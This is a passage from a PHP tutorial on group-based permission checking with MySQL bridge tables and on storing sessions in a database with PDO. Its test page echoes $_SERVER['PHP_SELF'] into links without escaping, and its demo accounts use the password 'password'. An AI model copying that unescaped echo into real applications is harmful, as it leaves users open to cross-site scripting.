         PRIMARY KEY (user_id),
         UNIQUE KEY user_login (login)
       );

       CREATE TABLE collection (
         collection_id INT(11)     NOT NULL auto_increment,
         name          VARCHAR(50) NOT NULL default '',
         description   TEXT        NOT NULL,
         PRIMARY KEY (collection_id)
       );



      Each user has a unique ID and login name, and several other pieces of information
      associated with his or her record. Each group has a unique ID, a name, and a
      description. We’ll use a bridge table to link users to their groups, and groups to
      their users. Here’s the definition of the user2collection lookup table:

                                                                    access_control.sql (excerpt)

       CREATE TABLE user2collection (
         user_id       INT(11)     NOT NULL default '0',
         collection_id INT(11)     NOT NULL default '0',
         PRIMARY KEY (user_id, collection_id)
       );

Notice that the primary key for the table uses both columns: this ensures that no
combination of user_id and collection_id can appear more than once.


           Be Aware of Reserved Words
         I use “collection” to refer to “group” in MySQL. “Group” is a reserved word in
         SQL, so it shouldn’t be used as a table name. Technically, it can be used with the
         proper quoting, but why run the risk of confusing ourselves—and possibly MySQL?
         You can find more about SQL reserved words at the MySQL web site.12


Here’s some hypothetical data that shows how the bridge table can be used:

 mysql> select * from user2collection;
 +---------+---------------+
 | user_id | collection_id |
 +---------+---------------+
 |       1 |             1 |
 |       2 |             1 |
 |       2 |             2 |
 |       3 |             1 |
 |       4 |             1 |
 +---------+---------------+
 5 rows in set (0.00 sec)



This data tells us that user 1 is a member of group 1, user 2 is a member of groups
1 and 2, user 3 is a member of group 1, and so on.
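
To make that reading of the bridge table concrete, here’s a small sketch that takes the five rows above as plain PHP arrays (as they might come back from a fetchAll call) and groups them by user. The $groupsByUser variable name is an assumption made for this illustration:

```php
<?php
// Rows as they might be returned by: SELECT * FROM user2collection
$rows = array(
    array('user_id' => 1, 'collection_id' => 1),
    array('user_id' => 2, 'collection_id' => 1),
    array('user_id' => 2, 'collection_id' => 2),
    array('user_id' => 3, 'collection_id' => 1),
    array('user_id' => 4, 'collection_id' => 1),
);

// Build a map of user_id => list of collection_ids.
$groupsByUser = array();
foreach ($rows as $row) {
    $groupsByUser[$row['user_id']][] = $row['collection_id'];
}

// The groups that user 2 belongs to.
print_r($groupsByUser[2]);
```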

We’ll also need a permission table for the purpose of keeping track of permissions:

                                                                    access_control.sql (excerpt)

 CREATE TABLE permission (
   permission_id INT(11)     NOT NULL AUTO_INCREMENT,
   name          VARCHAR(50) NOT NULL DEFAULT '',
   description   TEXT        NOT NULL,
   PRIMARY KEY (permission_id)
 );




12
     http://dev.mysql.com/doc/refman/4.1/en/reserved-words.html

      Each permission has a unique ID, a name, and a description. Permission names will
      represent actions: view, create, edit, and delete, for example. We’ll need a bridge
      table to link groups to permissions; here’s the collection2permission table:

                                                                   access_control.sql (excerpt)

       CREATE TABLE collection2permission (
         collection_id INT(11)     NOT NULL DEFAULT '0',
         permission_id INT(11)     NOT NULL DEFAULT '0',
         PRIMARY KEY (collection_id, permission_id)
       );



      With the lookup tables defined, we can now perform queries across the tables to
      identify the permissions a particular user has been allowed. For example, the
      following query returns all the permission names for the user with user_id 1:

       SELECT p.name AS permission
       FROM
         user2collection uc
         INNER JOIN collection2permission cp
           ON uc.collection_id = cp.collection_id
         INNER JOIN permission p
           ON cp.permission_id = p.permission_id
       WHERE uc.user_id = 1;



      Note that I’ve used aliases for table names, such as user2collection uc, to make
      writing the query easier.
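
If it helps to see what the two joins do, the following sketch walks the same path in plain PHP: from a user to that user’s groups, and from each group to its permissions. The sample IDs and the permissionsForUser function are assumptions made for illustration, not data from the access_control database:

```php
<?php
// permission table: permission_id => name (assumed sample data)
$permission = array(1 => 'view', 2 => 'create', 3 => 'edit', 4 => 'delete');
// Bridge rows: array(user_id, collection_id)
$user2collection = array(array(1, 1), array(2, 1), array(2, 2));
// Bridge rows: array(collection_id, permission_id)
$collection2permission = array(
    array(1, 1),
    array(2, 1), array(2, 2), array(2, 3),
);

function permissionsForUser($userId, $u2c, $c2p, $permission)
{
    $names = array();
    foreach ($u2c as $uc) {
        list($ucUser, $ucCollection) = $uc;
        if ($ucUser !== $userId) {
            continue; // WHERE uc.user_id = ...
        }
        foreach ($c2p as $cp) {
            list($cpCollection, $cpPermission) = $cp;
            // ON uc.collection_id = cp.collection_id
            // ON cp.permission_id = p.permission_id
            if ($cpCollection === $ucCollection
                && isset($permission[$cpPermission])) {
                $names[] = $permission[$cpPermission];
            }
        }
    }
    return $names;
}

print_r(permissionsForUser(2, $user2collection, $collection2permission,
    $permission));
```

Note that a user who belongs to two groups sharing a permission gets that permission twice, just as the SQL join would return two rows. Adding DISTINCT to the query, or array_unique in PHP, removes the repeats.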

      If you’ve downloaded and installed the sample access_control database mentioned
      in the introduction to this chapter, you’ll find it contains three sample user accounts
      with the details shown in Table 10.1.

      Table 10.1. Sample User Accounts

       Login                         Password                       Group

       jackblack                     password                       Users

       jackwhite                     password                       Editors

       siteadmin                     password                       Administrators

The access_control database also contains three sample groups, as shown in
Table 10.2.

Table 10.2. Sample Groups

 Group                               Permissions
 Users                               view
 Editors                             view, create, edit
 Administrators                      view, create, edit, delete


The User Class
The User class will encapsulate all the functionality for checking a user’s
permissions. Our class uses the following configuration settings:

                                                                  access_control.ini (excerpt)

 ; Access Control Settings

 ;web form variables e.g. $_POST['login']
 [login_vars]
 login=login

 ;user login table details
 [users_table]
 table=user
 col_id=user_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
 col_name_last=lastName
 col_signature=signature

 ;Permission table details
 [permission_table]
 table=permission
 col_id=permission_id
 col_name=name

 ;Collection table details
 [collection_table]
 table=collection


 col_id=collection_id
 col_name=name

 ;User to Collection lookup table details
 [user_to_collection_table]
 table=user2collection
 col_id=user_id
 col_collection_id=collection_id

 ;Collection to Permission lookup table details
 [collection_to_permission_table]
 table=collection2permission
 col_id=collection_id
 col_permission_id=permission_id




      We define some custom exception classes to provide a consistent level of error
      handling:

                                                                   User.class.php (excerpt)

       class UserException extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log('Error in '.$this->getFile().
             ' Line: '.$this->getLine().
             ' Error: '.$this->getMessage()
           );
         }
       }
       class UserDatabaseException extends UserException {}



      Our base class, UserException, is a custom exception that ensures the exception
      details are logged using the error_log function. The subclass
      UserDatabaseException represents a database problem. If you were to add further
      functionality to the User class, you could create further custom exceptions based
      on the UserException class to cover all possible exception situations.
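
As a rough sketch of how such a hierarchy behaves, the snippet below defines stand-in classes (renamed with a Demo prefix so the example is self-contained, and without the logging constructor) plus one hypothetical extra subclass, DemoUserPermissionException. It shows that a catch block for the base class also handles any subclass that has no more specific block of its own:

```php
<?php
// Stand-ins for the chapter's exception classes.
class DemoUserException extends Exception {}
class DemoUserDatabaseException extends DemoUserException {}
// Hypothetical additional subclass for a different kind of failure.
class DemoUserPermissionException extends DemoUserException {}

function describeFailure(Exception $e)
{
    try {
        throw $e;
    } catch (DemoUserDatabaseException $caught) {
        // The most specific class must be listed first.
        return 'database problem';
    } catch (DemoUserException $caught) {
        // Catches every other subclass of the base exception.
        return 'user problem';
    } catch (Exception $caught) {
        return 'unexpected problem';
    }
}

echo describeFailure(new DemoUserDatabaseException('db')), "\n";
echo describeFailure(new DemoUserPermissionException('perm')), "\n";
echo describeFailure(new RuntimeException('other')), "\n";
```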

      We begin to create the class by defining some class properties:

                                                               User.class.php (excerpt)

 class User
 {
   private $db;
   protected $cfg;
   private $userId;
   private $firstName;
   private $lastName;
   private $email;



$db will contain a PDO instance for our database connection, $cfg will store our
configuration details, and the remaining properties will contain information from
the user’s account details.

The constructor takes an instance of the PDO class, loads the configuration file, and
calls the populate method:

                                                               User.class.php (excerpt)

   public function __construct(PDO $db)
   {
     $this->db = $db;
     $this->cfg = parse_ini_file('access_control.ini', TRUE);
     $this->populate();
   }
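
The second argument passed to parse_ini_file asks PHP to group the settings by section, which is what makes lookups such as $this->cfg['users_table']['col_login'] possible. Here’s a minimal sketch that uses parse_ini_string on a shortened copy of the configuration, so it runs without the access_control.ini file; the $flat variable is included only for contrast:

```php
<?php
$ini = <<<INI
; Access Control Settings
[login_vars]
login=login

[users_table]
table=user
col_id=user_id
col_login=login
INI;

// With process_sections set to true, keys are nested under section names.
$cfg = parse_ini_string($ini, true);

echo $cfg['users_table']['table'], "\n";
echo $cfg['users_table']['col_login'], "\n";

// Without sections, the keys from every section share one flat array.
$flat = parse_ini_string($ini, false);
print_r(array_keys($flat));
```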



Next comes the populate method:

                                                               User.class.php (excerpt)

   private function populate()
   {
     $var_login = $this->cfg['login_vars']['login'];
     $user_table = $this->cfg['users_table']['table'];
     $user_id = $this->cfg['users_table']['col_id'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_email = $this->cfg['users_table']['col_email'];
     $user_first = $this->cfg['users_table']['col_name_first'];
     $user_last = $this->cfg['users_table']['col_name_last'];

      We load some configuration values into local variables to aid the readability of the
      code.

      Next, we attempt to look up the user’s details in the database:

                                                                     User.class.php (excerpt)

            $session = new Session();
            try
            {
              $sql = "SELECT
                  " . $user_id . ", " . $user_email . ",
                  " . $user_first . ", " . $user_last . "
                  FROM
                  " . $user_table . "
                  WHERE
                  " . $user_login . " = :login";
              $stmt = $this->db->prepare($sql);
              $login = $session->get($var_login);
              $stmt->bindParam(':login', $login);
              $stmt->execute();
              $row = $stmt->fetch(PDO::FETCH_ASSOC);
            }
            catch(PDOException $e)
            {
              throw new UserDatabaseException('Database error when' .
                  ' populating user details: '.$e->getMessage());
            }



      We first need to instantiate a new session object (which we built in “How do I create
      a session class?”). The session login variable is then used as the key to find the
      user’s details in the user table. If a PDOException is thrown, we throw our custom
      UserDatabaseException.

      Once we’ve retrieved the user’s record from the database, we store the details in
      the User object’s properties:

                                                              User.class.php (excerpt)

     $this->userId = $row[$user_id];
     $this->email = $row[$user_email];
     $this->firstName = $row[$user_first];
     $this->lastName = $row[$user_last];
    }



The populate method pulls the user’s record from the database and stores useful
pieces of information from that record in the object’s properties so that we can
access them easily, for example, when we want to display the user’s name on the
page. The most important step is to retrieve the user_id value, which we need for
checking permissions.

We also add a few accessor methods. Accessor methods give public read access to
otherwise private object properties, so code that uses the class can read the
values without being able to write to them:

                                                              User.class.php (excerpt)

   public function getId()
   {
     return $this->userId;
   }

   public function getFirstName()
   {
     return $this->firstName;
   }

   public function getLastName()
   {
     return $this->lastName;
   }

   public function getEmail()
   {
     return $this->email;
   }
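
The read-only effect can be seen in a cut-down sketch. The Member class below is a hypothetical stand-in for User with a single property, and the behavior shown for the failed write assumes PHP 7 or later, where it raises a catchable Error:

```php
<?php
// Hypothetical cut-down class with one private property and an accessor.
class Member
{
    private $email;

    public function __construct($email)
    {
        $this->email = $email;
    }

    public function getEmail()
    {
        return $this->email;
    }
}

$member = new Member('jack@example.com');
echo $member->getEmail(), "\n";

// Writing to the private property from outside the class fails.
$writeBlocked = false;
try {
    $member->email = 'other@example.com';
} catch (Error $e) {
    $writeBlocked = true; // PHP 7+ throws an Error here
}
var_dump($writeBlocked);
```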



Finally, we add the checkPermission method. This method takes a named permission
as an argument and checks that the user has that permission:

                                                                    User.class.php (excerpt)

         public function checkPermission($permission)
         {
           if (!isset($this->permissions))
           {
             $perm_table = $this->cfg['permission_table']['table'];
             $perm_id = $this->cfg['permission_table']['col_id'];
             $perm_name = $this->cfg['permission_table']['col_name'];
             $u2c_table = $this->cfg['user_to_collection_table']['table'];
             $u2c_id = $this->cfg['user_to_collection_table']['col_id'];
             $c2p_table =
                 $this->cfg['collection_to_permission_table']['table'];
             $c2p_id =
                 $this->cfg['collection_to_permission_table']['col_id'];
             $c2p_pid = $this->cfg['collection_to_permission_table']
                 ['col_permission_id'];




      The first step we take is to check that the permissions array for this user has been
      set. If not, we proceed with the database lookup. Before we perform the lookup,
      though, we assign some configuration settings to local variables to help improve
      our code’s readability.

      Next, we assemble the SQL query and perform the lookup using the User->userId
      property as the key:

                                                                    User.class.php (excerpt)

              try
              {
                $this->permissions = array();
                $sql = 'SELECT p.'. $perm_name .' as perm
                    FROM
                    ' . $u2c_table . ' uc
                    INNER JOIN ' . $c2p_table . ' cp
                    ON uc.' . $u2c_id . ' = cp.' . $c2p_id . '
                    INNER JOIN ' . $perm_table . ' p
                    ON cp.' . $c2p_pid . ' = p.' . $perm_id . '
                    WHERE uc.user_id =:user';
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':user', $this->userId);
                $stmt->execute();
                while ($row = $stmt->fetch(PDO::FETCH_ASSOC))
                {
                  // The query aliases the permission name column as "perm"
                  $this->permissions[] = $row['perm'];
                }
              }
              catch(PDOException $e)
              {
                throw new UserDatabaseException('Database error when' .
                    ' checking permissions: '.$e->getMessage());
              }
            }




If the lookup has returned database rows, we store them in the User->permissions
array property. This means that if we need to check permissions more than once
on a page, those checks will only come at the cost of a single query. And, as usual, if
a PDOException is thrown, we in turn throw our custom UserDatabaseException.

Finally, we check that the permission passed into the method as an argument in
the $permission variable is included in the user’s permissions array:

                                                                User.class.php (excerpt)

         if (in_array($permission, $this->permissions))
         {
           return true;
         }
         else
         {
           return false;
         }
     }
 }



The checkPermission method simply returns true if the user has the permission, and
false if not.
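
Because in_array already returns a boolean, the final check can also be written as a single return statement. The following is a minimal sketch rather than the code used in the User class: hasPermission is a hypothetical standalone helper that receives the permissions array directly, and the third argument to in_array requests strict comparison.

```php
<?php
// Hypothetical helper for illustration only; the User class in this
// chapter keeps the equivalent logic inside checkPermission().
function hasPermission(array $granted, $permission)
{
    // in_array() returns true or false itself, so no if/else is needed.
    // The third argument (true) enables strict, type-safe comparison.
    return in_array($permission, $granted, true);
}
```

Called as hasPermission($this->permissions, $permission), this would behave like the if/else block above for string permission names.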

The Permissions Test Page
Now, to test our permissions system, we can build a permissions testing page. This
testing page will require you to log in using the details of one of the accounts in the
user table, and will simulate an attempt to access one of four permission levels
defined in the permission table: view, create, edit, and delete.

      First, we need to include all the required classes and the database credentials file:

                                                                   permissions.php (excerpt)

       <?php
       require_once    'Session.class.php';
       require_once    'Auth.class.php';
       require_once    'User.class.php';
       require_once    'dbcred.php';



      Next, we instantiate our PDO, Auth (which we met in “How do I create a class to
      control access to a section of the site?”), and User objects:

                                                                   permissions.php (excerpt)

       try
       {
         $db = new PDO($dsn, $user, $password);
         $auth = new Auth($db, 'login.php', 'secret');
         $authuser = new User($db);



      The Auth object will make sure the current user is authorized, and redirect them to
      the login form if not. If the user is authorized, we create a User object in order to
      be able to check the user’s permissions.

      We’re simulating permissions through a query string variable—$_GET['view']:

                                                                   permissions.php (excerpt)

         switch (@$_GET['view']) {
           case 'create':
             $permission = 'create';
             $msg = 'You are able to create new content.';
             break;
           case 'edit':
             $permission = 'edit';
             $msg = 'You are able to edit existing content.';
             break;
           case 'delete':
             $permission = 'delete';
             $msg = 'You are able to delete existing content.';
             break;
           default:
             $permission = 'view';
             $msg = 'You are able to read existing content.';
         }




We set the permission level and the $msg variable—the message that appears on the
page—to reflect the value of $_GET['view'].
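
The same mapping can be expressed as a lookup table, which avoids the @ error-suppression operator and keeps each permission next to its message. This is only a sketch of an alternative, not the code used in permissions.php; resolveView is a hypothetical helper name.

```php
<?php
// Hypothetical helper: maps the "view" query string value to a
// permission name and page message, falling back to 'view'.
function resolveView(array $query)
{
    $views = array(
        'view'   => 'You are able to read existing content.',
        'create' => 'You are able to create new content.',
        'edit'   => 'You are able to edit existing content.',
        'delete' => 'You are able to delete existing content.',
    );

    // isset() replaces the @ operator: a missing key is handled explicitly.
    $requested = isset($query['view']) ? $query['view'] : 'view';

    // Anything that is not a known string key falls back to 'view'.
    if (!is_string($requested) || !isset($views[$requested])) {
        $requested = 'view';
    }
    return array($requested, $views[$requested]);
}

list($permission, $msg) = resolveView($_GET);
```

Unknown values fall back to the view permission, just as the default branch of the switch statement does.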

Next, we test the user’s permissions:

                                                            permissions.php (excerpt)

   if (!$authuser->checkPermission($permission)) {
     $msg = 'You do not have permission to do this.';
   }



If the user doesn’t have the required permission, we take appropriate action. Since
this demonstration is merely a test, we simply set the page message to indicate that
the user does not have the required permission level. In a production web
application, you’d redirect the user to the login form, adding a message to indicate
that they’re not authorized to obtain that level of access.

Finally, we make sure to catch any exceptions and take appropriate action:

                                                            permissions.php (excerpt)

 }
 catch (Exception $e)
 {
   $msg = 'An error has occurred: ' . $e->getMessage();
 }
 ?>



The only task left is to create the HTML for our permissions testing page:

                                                                   permissions.php (excerpt)

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           ⋮ HTML Head contents…
         </head>
         <body>
           <h1>Permissions Test</h1>
           <p>
             <a href="<?php echo $_SERVER['PHP_SELF']; ?>">View</a> |
             <a href="<?php echo $_SERVER['PHP_SELF'];
               ?>?view=create">Create</a> |
             <a href="<?php echo $_SERVER['PHP_SELF'];
               ?>?view=edit">Edit</a> |
             <a href="<?php echo $_SERVER['PHP_SELF'];
               ?>?view=delete">Delete</a>
           </p>
           <h2><?php echo $authuser->getFirstName() . ' ' .
               $authuser->getLastName(); ?></h2>
           <p>Permission Level: '<?php echo $permission ?>'</p>
           <p><?php echo $msg; ?></p>
         </body>
       </html>



      The testing page is very simple. First, we have a menu of links that test each
      permission level by appending the appropriate query string to the link URLs. Then, we
      have a simple page body that consists of the current user’s name, the current
      permission level, and the message set by the permissions test.

      Discussion
      The User class fetches data on a “need to know” basis. That is, despite the fact that
      some user data is retrieved on instantiation using the populate method, the data
      pertaining to permissions may not be needed every time the User class is instantiated.
      It’s likely that we’ll only check permissions on a restricted number of pages, so we
      can save ourselves a database query when the user views public pages, and leave
      the checkPermission method to be called only when needed. This approach of
      fetching data from the database only at the moment it is needed, as opposed to
      performing all the queries at the beginning, is known as lazy fetching, and can be a
      useful approach to reducing unnecessary queries and performance overhead.
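
The lazy fetching pattern can be sketched without a database. In the example below, LazyPermissions is a hypothetical stand-in for the User class, and the loader callable plays the role of the SQL query in checkPermission; the counter shows that the lookup runs once, however many checks follow.

```php
<?php
// Illustrative stand-in for the User class: the loader callable plays
// the role of the database query in checkPermission().
class LazyPermissions
{
    private $loader;
    private $permissions = null; // null means "not fetched yet"

    public function __construct(callable $loader)
    {
        $this->loader = $loader;
    }

    public function check($permission)
    {
        if ($this->permissions === null) {
            // First call only: run the expensive lookup and cache it.
            $this->permissions = call_user_func($this->loader);
        }
        return in_array($permission, $this->permissions, true);
    }
}

$queries = 0;
$perms = new LazyPermissions(function () use (&$queries) {
    $queries++; // count how often the "database" is hit
    return array('view', 'edit');
});

$canEdit = $perms->check('edit');     // triggers the lookup
$canDelete = $perms->check('delete'); // served from the cached array
```

If check is never called, the loader never runs, which is the saving that lazy fetching offers on public pages.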

The permissions testing page was a simple example, of course, but you could use
the checkPermission method any way you like, perhaps within if statements to
decide what a user is allowed to do and see. Another approach would be to use a
variable, like the $msg variable we’ve used here, to store the name of a PHP
script that contains the restricted content, for use with an include statement.

Otherwise, that’s all there is to it. Now, all you need to do is build an administration
interface to control Users, Groups, and Permissions. Well, what are you waiting for?


How do I store sessions in a database?
As discussed earlier, in “How do I use sessions?”, the default behavior of sessions
in PHP on the server side is to create a temporary file in which session data is stored.
This file is usually kept in the temporary directory of the operating system and, as
such, presents a security risk to your applications, especially if you’re using a shared
server.

Solution
Use the PHP function session_set_save_handler to specify a custom session
handler that provides an alternative data store that’s fully under your control. The
session_set_save_handler function definition is as follows:


 bool session_set_save_handler (callback $open,
     callback $close,
     callback $read,
     callback $write,
     callback $destroy,
     callback $gc
 );



Each callback argument is a function that must conform to PHP’s session handler API.
You can read more about the function in the PHP manual.13 You could simply
implement a separate function for each callback; in this solution, however, we create
a new class, DatabaseSession, to encapsulate all our session handling needs, and use
a PDO object to connect to a database and store session information there.
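
Since PHP 5.4, session_set_save_handler also accepts a single object that implements the built-in SessionHandlerInterface, as an alternative to six separate callbacks. The sketch below is not the approach used in this solution: ArraySessionHandler is a hypothetical class that keeps its data in a PHP array, so nothing survives the request, and its type declarations assume PHP 8.0 or later.

```php
<?php
// Hypothetical in-memory handler, for illustration only.
class ArraySessionHandler implements SessionHandlerInterface
{
    private $store = array(); // session ID => array('data', 'time')

    public function open(string $path, string $name): bool
    {
        return true; // nothing to connect to
    }

    public function close(): bool
    {
        return true;
    }

    public function read(string $id): string|false
    {
        // An unknown session ID yields an empty string, not an error.
        return isset($this->store[$id]) ? $this->store[$id]['data'] : '';
    }

    public function write(string $id, string $data): bool
    {
        $this->store[$id] = array('data' => $data, 'time' => time());
        return true;
    }

    public function destroy(string $id): bool
    {
        unset($this->store[$id]);
        return true;
    }

    public function gc(int $max_lifetime): int|false
    {
        // Remove entries last written before the cutoff; report the count.
        $cutoff = time() - $max_lifetime;
        $removed = 0;
        foreach ($this->store as $id => $entry) {
            if ($entry['time'] < $cutoff) {
                unset($this->store[$id]);
                $removed++;
            }
        }
        return $removed;
    }
}

// Registration would happen before session_start():
// session_set_save_handler(new ArraySessionHandler(), true);
```

The six methods correspond one-to-one to the callbacks listed in the function definition above.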


13 http://www.php.net/session_set_save_handler/

      Before we delve into the details of the class, I’ll show you the CREATE TABLE
      statement for the session table we use. This table stores a minimal amount of
      information, so feel free to add more if you wish; for example, you might like to
      store the IP address or the last page visited. Just remember to add the new columns
      and values to the queries that are used throughout the class’s methods below:

       CREATE TABLE session (
         sess_id       VARCHAR(255),
         sess_start    DATETIME,
         sess_last_acc DATETIME,
         sess_data     TEXT,  -- serialized session data can exceed 255 characters
         PRIMARY KEY (sess_id)
       );



      The DatabaseSession Class
      Now, let’s look at the class. We begin by defining the class properties:

                                                           DatabaseSession.class.php (excerpt)

       class DatabaseSession
       {
         private $sess_table;
         private $sess_db;
         private $sess_db_host;
         private $sess_db_usr;
         private $sess_db_pass;
         private $db;



      $sess_table will store the database table name, $sess_db will store the database
      name, $sess_db_host will store the database server hostname, $sess_db_usr will
      store the database username, and $sess_db_pass will store the database password.
      The $db property will store the PDO object used for all the database queries.

      Next, we define the constructor method:

                                                   DatabaseSession.class.php (excerpt)

   public function __construct($sess_db_usr = 'user',
       $sess_db_pass = 'passwd',
       $sess_table = 'session',
       $sess_db = 'dbname',
       $sess_db_host = 'localhost')
   {
     $this->sess_db_usr = $sess_db_usr;
     $this->sess_db_pass = $sess_db_pass;
     $this->sess_table = $sess_table;
     $this->sess_db = $sess_db;
     $this->sess_db_host = $sess_db_host;
   }



The constructor simply stores the database information passed to the method
within the object’s properties.

The first function callback that we must pass to the session_set_save_handler
function is an open function, which is called when a session is started. The open
method of the DatabaseSession class will handle that job:

                                                   DatabaseSession.class.php (excerpt)

   public function open($path, $name)
   {
     try
     {
       $dsn = "mysql:host={$this->sess_db_host};".
           "dbname={$this->sess_db}";
       $this->db = new PDO($dsn, $this->sess_db_usr,
           $this->sess_db_pass );
       $this->db->setAttribute(PDO::ATTR_ERRMODE,
           PDO::ERRMODE_EXCEPTION);
     }
     catch (PDOException $e)
     {
       error_log('Error connecting to the session database.');
       error_log('Reason given:'.$e->getMessage()."\n");
       return false;
     }
     return true;
   }

      This method is called with two string arguments, the session save path and the
      session name, and must return either true or false. Both values are irrelevant to us
      as we’re using a database, so we do nothing with them. In the method, we make the
      connection to the database that will hold the session data. If there’s an error, we
      return false; if the database connection is successful, we return true.

      The next function callback we need to implement is the close function, so we add
      a close method to our class:

                                                            DatabaseSession.class.php (excerpt)

         public function close()
         {
           $this->db = null;
           return true;
         }



      The close method is called when we end a session, and must return either true or
      false. It isn’t uncommon to manually call the garbage collection (gc) method here,
      though it isn’t strictly necessary, since PHP triggers its own garbage collection
      periodically. We release our database connection by setting the $db property to null.

      session_set_save_handler also requires that a read function be implemented.
      The read function needs to take the session ID as an argument and return a
      string—even an empty one, if that’s appropriate. We implement a read method in
      our class:

                                                            DatabaseSession.class.php (excerpt)

         public function read($sess_id)
         {
           try
           {
             $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " .
                 "sess_id = :id";
             $stmt = $this->db->prepare($sql);
             $stmt->execute(array(':id'=>$sess_id));
             $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
           }
           catch (PDOException $e)
           {
             error_log('Error reading the session data table in the' .
                 ' session reading method.');
             error_log(' Query with error: '.$sql);
             error_log(' Reason given:'.$e->getMessage()."\n");
             return '';
           }
           if (count($res) > 0)
           {
             return isset($res[0]['sess_data']) ?
                 $res[0]['sess_data'] : '';
           }
           else
           {
             return '';
           }
         }




The read method retrieves the session data from the database, using the session ID
as the key, and returns the data as a string. If no data is found or there’s a database
error, an empty string is returned.

After the read function, the next function callback we need to implement is the
write function. This function, as the name implies, handles the writing of the session
data. The function is required to take two arguments—the session ID and the session
data—and the return value must be either true or false. We implement a write
method in our class-based solution. In our method, we first see if the session ID is
already in the database:

                                                     DatabaseSession.class.php (excerpt)

   public function write($sess_id, $data)
   {
     try
     {
       $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " .
           "sess_id = :id";
       $stmt = $this->db->prepare($sql);
       $stmt->execute(array(':id'=>$sess_id));
       $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
     }
     catch (PDOException $e)
     {
       error_log('Error reading the session data table in the' .
           ' session writing method.');
       error_log(' Query with error: '.$sql);
       error_log(' Reason given:'.$e->getMessage()."\n");
       return false;
     }




      The $res variable contains the result of our database lookup. Based upon this result,
      we either update the existing session record with an SQL UPDATE query or insert a
      new one with an SQL INSERT query:

                                                          DatabaseSession.class.php (excerpt)

            try
            {
              if (count($res) > 0)
              {
                $sql = "UPDATE {$this->sess_table} SET" .
                    " sess_last_acc = NOW(), sess_data = :data" .
                    " WHERE sess_id = :id";
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':data', $data);
                $stmt->bindParam(':id', $sess_id);
              }
              else
              {
                $sql ="INSERT INTO {$this->sess_table}(sess_id," .
                    " sess_start, sess_last_acc," .
                    " sess_data) VALUES (:id, NOW(), NOW(), :data)";
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':id', $sess_id);
                $stmt->bindParam(':data', $data);
              }
              $res = $stmt->execute();
            }

If you know you’ll only be using MySQL as your database, consider using the
REPLACE syntax instead.14 Since we don’t want to limit our class to MySQL, we use
the longer but more compatible method above.

Finally, we need to catch any PDOExceptions and return true or false:

                                                                DatabaseSession.class.php (excerpt)

          catch (PDOException $e)
          {
            error_log('Error writing to the session data table.');
            error_log('Query with error: '.$sql);
            error_log('Reason given:'.$e->getMessage()."\n");
            return false;
          }
          return true;
      }



Our next task is to implement a destroy function, which, as the name suggests, is
called when the session is destroyed. It receives the session ID as an argument and
must return either true or false. In our class method destroy, we simply delete the
session from the database using the session ID as the key, and return false if an error
occurs or true if the operation succeeds:

                                                                DatabaseSession.class.php (excerpt)

      public function destroy($sess_id)
      {
        try
        {
          $sql = "DELETE FROM {$this->sess_table} WHERE sess_id = :id";
          $stmt = $this->db->prepare($sql);
          $stmt->execute(array(':id'=>$sess_id));
        }
        catch (PDOException $e)
        {
          error_log('Error destroying the session.');
          error_log('Query with error: '.$sql);
          error_log('Reason given:'.$e->getMessage()."\n");
          return false;
        }
        return true;
      }

14 REPLACE is a MySQL extension to the SQL standard that either inserts a new row, or deletes an old
row and inserts the new row if the old row had the same value as the new row for a PRIMARY KEY or
UNIQUE index. You can read more about it at http://dev.mysql.com/doc/refman/5.1/en/replace.html.




      The final function we are required to implement is the gc, or garbage collection,
      function, which is used to clean out any old sessions that were never closed properly.
      It receives an integer argument for the “time to live” (TTL) value for a session. In
      our class method, gc, we delete any session record where the last access time is
      earlier than the current time minus the TTL value:

                                                           DatabaseSession.class.php (excerpt)

         public function gc($ttl)
         {
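           // sess_last_acc is a DATETIME column, so compare it with a
           // formatted date string rather than a raw Unix timestamp
           $end = date('Y-m-d H:i:s', time() - $ttl);
           try
           {
             $sql = "DELETE FROM {$this->sess_table} WHERE" .
                 " sess_last_acc < :end";
             $stmt = $this->db->prepare($sql);
             $stmt->execute(array(':end'=>$end));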
           }
           catch (PDOException $e)
           {
             error_log('Error with the garbage collection method of the' .
                 ' session class.');
             error_log('Query with error: '.$sql);
             error_log('Reason given:'.$e->getMessage());
             return false;
           }
           return true;
         }



      The garbage collection method is called by PHP as dictated by the php.ini settings
      session.gc_probability and session.gc_divisor, and is checked every time a
      new session is started. Again, you can call it manually in the session close method
      if you wish.
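
To make the arithmetic concrete, the sketch below computes the cutoff time for a given TTL and the chance that PHP triggers garbage collection when a session starts. Both functions are hypothetical helpers, not part of DatabaseSession, and the example assumes that PHP and the database server both use UTC. The values 1440, 1, and 100 are PHP’s built-in defaults for session.gc_maxlifetime, session.gc_probability, and session.gc_divisor.

```php
<?php
// Hypothetical helpers for illustration; neither is part of
// DatabaseSession.

// Returns the cutoff as a DATETIME-style string, so that it can be
// compared with a DATETIME column such as sess_last_acc.
function sessionCutoff($ttl, $now)
{
    return date('Y-m-d H:i:s', $now - $ttl);
}

// Chance (between 0 and 1) that garbage collection runs at session
// start: session.gc_probability divided by session.gc_divisor.
function gcChance($probability, $divisor)
{
    return $probability / $divisor;
}

// Assumption: PHP and the database server agree on the time zone.
date_default_timezone_set('UTC');

$cutoff = sessionCutoff(1440, 86400); // 24 minutes before 1970-01-02 00:00:00
$chance = gcChance(1, 100);           // one session start in a hundred
```

With the default settings, then, a session untouched for more than 24 minutes becomes eligible for deletion, but the gc method itself only runs on roughly one in every hundred session starts.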


         MySQL MyISAM Engine Performance
         If your session table sees high rates of insertions and deletions, you should consider
         adding an OPTIMIZE TABLE query to the garbage collection function to reclaim
         unused space and help increase performance. For more information on OPTIMIZE
         TABLE, see the MySQL manual.15


Finally, we implement a class __destruct method. This step is necessitated by the
changes that were made in how PHP sessions are closed after version 5.0.5. Basically,
we just have to make sure the session is explicitly written and closed by calling the
session_write_close function. You can read more about this task on the manual
page.16 Here’s our __destruct method and the end of our class definition:

